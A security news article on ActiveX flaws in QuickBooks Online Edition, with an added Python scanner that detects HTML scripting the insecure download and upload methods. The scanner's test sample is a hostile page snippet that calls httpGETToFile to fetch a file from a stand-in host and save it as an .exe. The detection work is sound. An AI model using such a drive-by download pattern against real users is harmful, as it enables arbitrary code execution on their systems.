ActiveX flaws haunt QuickBooks Online

Summary: The U.S. Computer Emergency Readiness Team (US-CERT) is warning about multiple code execution holes affecting users of Intuit QuickBooks Online Edition.


The vulnerabilities, rated "highly critical" by Secunia, can be exploited by a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.

"By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash," according to the US-CERT alert.


Intuit's QuickBooks Online Edition is a version of the popular accounting software that functions within Internet Explorer as an ActiveX control.

Some technical details of the security bugs from Secunia:

1) The insecure methods "httpGETToFile()" and "httpPOSTFromFile()" in the QuickBooks Online Edition ActiveX control can be exploited to download files to, or upload files from, arbitrary locations on the user's system.

2) Unspecified boundary errors exist in the QuickBooks Online Edition ActiveX control, which can be exploited to cause stack-based buffer overflows.

Successful exploitation requires that the target is lured into visiting a maliciously rigged Web site.
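As an added example (not from the article, US-CERT, Secunia or Intuit), a small Python scanner that a mail gateway or web proxy could run to flag HTML that instantiates an ActiveX object and scripts the two method names the advisory cites; the CLSID, the method arguments and both sample documents are constructed placeholders.

```python
"""Flag HTML/e-mail bodies that script the insecure file-transfer methods
named in the QuickBooks Online Edition advisory (added example)."""
import re
from html.parser import HTMLParser

# Method names as quoted by the advisory; any CLSID is recorded because the
# control's real CLSID is not given in the article.
INSECURE_METHODS = ("httpGETToFile", "httpPOSTFromFile")
CALL_RE = re.compile(r"\.(%s)\s*\(([^)]*)\)" % "|".join(INSECURE_METHODS), re.I)


class ObjectScanner(HTMLParser):
    """Collects <object classid="clsid:..."> tags and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.clsids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object" and (a.get("classid") or "").lower().startswith("clsid:"):
            self.clsids.append(a["classid"][6:].strip("{}").upper())
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html(html):
    """Return CLSIDs seen, (method, raw arguments) for each scripted call, and a
    verdict: suspicious only when an ActiveX object is scripted with these methods."""
    p = ObjectScanner()
    p.feed(html)
    calls = [(m.group(1), m.group(2).strip()) for s in p.scripts for m in CALL_RE.finditer(s)]
    return {"clsids": p.clsids, "calls": calls, "suspicious": bool(p.clsids and calls)}


# Constructed samples: a placeholder CLSID, not the real control's identifier.
SAMPLE_BAD = """<html><body>
<object id="qbo" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script>qbo.httpGETToFile("http://example.invalid/f", "C:\\\\placeholder\\\\f.exe");</script>
</body></html>"""
SAMPLE_OK = """<html><body><p>Quarterly report attached.</p></body></html>"""
```

Run `scan_html()` over message bodies at the gateway and quarantine or alert on `suspicious`; the returned call arguments give the analyst the destination path to check on the endpoint.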

The vulnerabilities have been confirmed in version 9 of QuickBooks Online Edition. Users are strongly urged to apply an available update from Intuit.

Topics: Browser, Security

About

Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the globe. He is taking a leadership role in developing the company's online community initiative around secure content managem...
